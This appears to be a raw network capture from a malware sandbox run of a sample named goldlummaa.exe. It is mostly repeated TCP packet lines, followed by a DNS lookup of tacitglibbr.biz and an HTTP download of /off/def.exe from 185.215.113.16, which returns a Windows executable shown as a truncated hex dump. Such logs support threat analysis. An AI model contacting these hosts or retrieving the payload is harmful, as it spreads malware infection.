                                                                                                                Dec 18, 2024 14:18:17.748219967 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.748364925 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.748452902 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.749074936 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.749140024 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.749187946 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.749896049 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.749989033 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.750026941 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.750693083 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.750942945 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.750982046 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.751476049 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.751583099 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.751707077 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.752309084 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.752432108 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.752473116 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.753143072 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.753381014 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.753426075 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.754014015 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.754126072 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.754781008 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.754851103 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.754961014 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.755002022 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.755660057 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.755717993 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.755775928 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.756433964 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.756453991 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.756494045 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.757260084 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.757323027 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.757412910 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.758023024 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.758152962 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.758199930 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.758900881 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.758985996 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.759072065 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.759721041 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.759890079 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.759932995 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.760519981 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.760857105 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.760891914 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.761364937 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.761504889 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.761562109 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.762259960 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.762273073 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.762322903 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.763032913 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.763098955 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.763204098 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.763968945 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.764087915 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.764127016 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.764760017 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.764812946 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.764856100 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.765522003 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.765832901 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.765871048 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.766253948 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.766403913 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.767076015 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.767141104 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.767311096 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.767354965 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.768017054 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.768337965 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.768426895 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.768847942 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.768893003 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.768958092 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.769671917 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.769750118 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.769795895 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.770482063 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.770631075 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.770705938 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.771220922 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.771325111 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.771363020 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.771996975 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.826332092 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.856576920 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.924540043 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.924557924 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.924568892 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.924624920 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.924638033 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.924649000 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.924663067 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.924803972 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.924817085 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.924854040 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.924854040 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.924953938 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.924978018 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.924995899 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.925167084 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.925313950 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.925991058 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.926058054 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.926111937 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.926155090 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.926904917 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.927042007 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.927664042 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.927768946 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.927789927 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.927807093 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.928455114 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.928477049 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.928527117 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.929306030 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.929507971 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.930016041 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.930068970 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.930110931 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.930149078 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.930828094 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.930921078 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.931649923 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.931699991 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.931756973 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.931794882 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.932490110 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.932573080 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.932626009 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.933341026 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.933454037 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.934151888 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.934204102 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.934272051 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.934309006 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.934981108 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.935149908 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.935755968 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.935801029 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.935950041 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.936448097 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.936703920 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.936830997 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.937417984 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.937468052 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.937515974 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.937551022 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.938276052 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.938323021 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.939091921 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.939140081 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.939174891 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.939235926 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.939932108 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.940052032 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.940444946 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.940753937 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.941009045 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.941534042 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.941587925 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.941711903 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.941752911 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.942358971 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.942603111 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.943299055 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.943358898 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.943429947 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.943468094 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.944015026 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.944190025 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.944443941 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.944848061 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.945168972 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.945660114 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.945710897 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.945755005 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.945795059 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.946553946 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.946645975 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.947582006 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.947597980 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.947638035 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.947670937 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.948184013 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.948435068 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.948960066 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.949012995 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.949040890 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.949074030 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.949834108 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.949898005 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.950603008 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.950654030 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.950691938 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.950727940 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.951508999 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.951523066 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.951570034 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.952327013 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.952358007 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.952433109 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.953025103 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.953145027 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.953923941 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.953950882 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.953979969 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.954009056 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.954699993 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.954837084 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.954885960 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.955504894 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.955668926 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.956450939 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.956453085 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.956466913 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.956501007 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.957287073 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.957300901 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.957350016 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.957992077 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.958187103 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.958842993 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.958895922 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.958930969 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.958966017 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.959745884 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.959784985 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.960453033 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.960473061 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.960719109 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.961323977 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.961366892 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.961478949 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.961517096 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.962085009 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.962246895 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.962901115 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.962949038 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.962987900 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.963021994 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.963767052 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.963970900 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.964440107 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.964529037 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.966702938 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:18.114610910 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:18.114720106 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:18.114794970 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:18.115010977 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:18.115262985 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:18.115705013 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:18.115773916 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:18.115856886 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:18.115927935 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:18.116621017 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:18.116636992 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:18.116694927 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:18.117305994 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:18.117424965 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:18.117474079 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:18.118463993 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:18.118483067 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:18.118541956 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:48.977854013 CET4980780192.168.2.9185.215.113.16
                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                Dec 18, 2024 14:17:38.040410042 CET6215853192.168.2.91.1.1.1
                                                                                                                Dec 18, 2024 14:17:38.353465080 CET53621581.1.1.1192.168.2.9
                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                Dec 18, 2024 14:17:38.040410042 CET192.168.2.91.1.1.10xcf2fStandard query (0)tacitglibbr.bizA (IP address)IN (0x0001)false
                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                Dec 18, 2024 14:17:38.353465080 CET1.1.1.1192.168.2.90xcf2fNo error (0)tacitglibbr.biz104.21.50.161A (IP address)IN (0x0001)false
                                                                                                                Dec 18, 2024 14:17:38.353465080 CET1.1.1.1192.168.2.90xcf2fNo error (0)tacitglibbr.biz172.67.164.37A (IP address)IN (0x0001)false
                                                                                                                • tacitglibbr.biz
                                                                                                                • 185.215.113.16
                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                0192.168.2.949807185.215.113.16807460C:\Users\user\Desktop\goldlummaa.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Dec 18, 2024 14:18:13.659239054 CET200OUTGET /off/def.exe HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                Host: 185.215.113.16
                                                                                                                Dec 18, 2024 14:18:15.030055046 CET1236INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                Date: Wed, 18 Dec 2024 13:18:14 GMT
                                                                                                                Content-Type: application/octet-stream
                                                                                                                Content-Length: 1740288
                                                                                                                Last-Modified: Wed, 18 Dec 2024 12:15:55 GMT
                                                                                                                Connection: keep-alive
                                                                                                                ETag: "6762bcfb-1a8e00"
                                                                                                                Accept-Ranges: bytes
                                                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 e0 44 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 45 00 00 04 00 00 93 bb 1a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 44 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                Data Ascii: MZ@z!L!This program cannot be run in DOS mode.$PELP(,e"0$D `@ E`Ui`D @ @.rsrcD`2@.idata 6@ )8@ypwuvcjd@*,:@hofyjmtb Df@.taggant@D"l@
                                                                                                                Dec 18, 2024 14:18:15.030091047 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                Data Ascii:
                                                                                                                Dec 18, 2024 14:18:15.030105114 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                Data Ascii:
